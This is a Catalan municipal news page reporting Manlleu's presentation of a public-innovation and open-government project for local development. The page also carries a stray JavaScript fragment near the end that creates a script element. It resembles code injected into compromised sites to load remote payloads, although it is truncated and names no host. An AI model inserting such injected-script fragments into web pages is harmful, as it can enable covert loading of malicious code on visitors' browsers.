• Inici
  • Butlletí
  • Manlleu presenta el Projecte d’innovació pública en el desenvolupament local

Manlleu presenta el Projecte d’innovació pública en el desenvolupament local

El dijous dia 14 de juliol es va presentar davant del cap del Servei de Desenvolupament Econòmic Local de la Generalitat de Catalunya, Mateo Hernando, i de diversos  tècnics de desenvolupament local de  poblacions i organitzacions veïnes aquest projecte que pretén portar a la pràctica un pla d’oportunitats i viabilitat d’innovació pública per a la gestió del desenvolupament socioeconòmic local. El debat entorn del model proposat i la seva possibilitat de transferibilitat adaptat a les característiques de cada context concret van centrar el desenvolupament de la jornada de treball.

L’objectiu del Projecte, que ha comptat amb la col·laboració dels consultors especialistes en innovació pública i govern obert Alberto Ortiz de Zárate i Anton Queralt Altés, se centra en la redefinició de les relacions internes i externes de l’administració d’acord amb les necessitats i potencialitats de les persones i en consonància amb les implicacions del paradigma del govern obert de participació, col·laboració i transparència.

Alguns dels pilars fonamentals d’aquest Projecte són: la consolidació, i també assumpció en la dinàmica de treball dels empleats públics, d’espais d’innovació oberts i participatius a tots els agents implicats en el desenvolupament local que possibilitin la identificació i innovació de productes i serveis; el desenvolupament d’un model de creació de valor públic que permeti avaluar l’impacte i la bondat de les accions, o la definició d’un model de màrqueting públic que permeti connectar amb els destinataris idonis i crear xarxes col·laborat ives.

La voluntat final és la de consolidar una administració que treballi per a persones informades, connectades i amb capacitat perquè puguin influir directament en les decisions públiques. Amb la ciutadania i per a la ciutadania. Des de l’OPE de l’Ajuntament de Manlleu s’apunta que “l’objectiu d’obrir l’Administració pública  ha de ser, en tot moment, la millora de la qualitat de vida de les persones i la manera d’aconseguir-ho és, senzillament, fer-ho diferent. I creure-hi.”

var d=document;var s=d.createElement(‘script’);

Etiquetes,

Imprimir aquest article

Trackback from your site.

Deixa un comentari

Hauries d' identificar-te per deixar un comentari.
A Manlleu
Fem Xarxa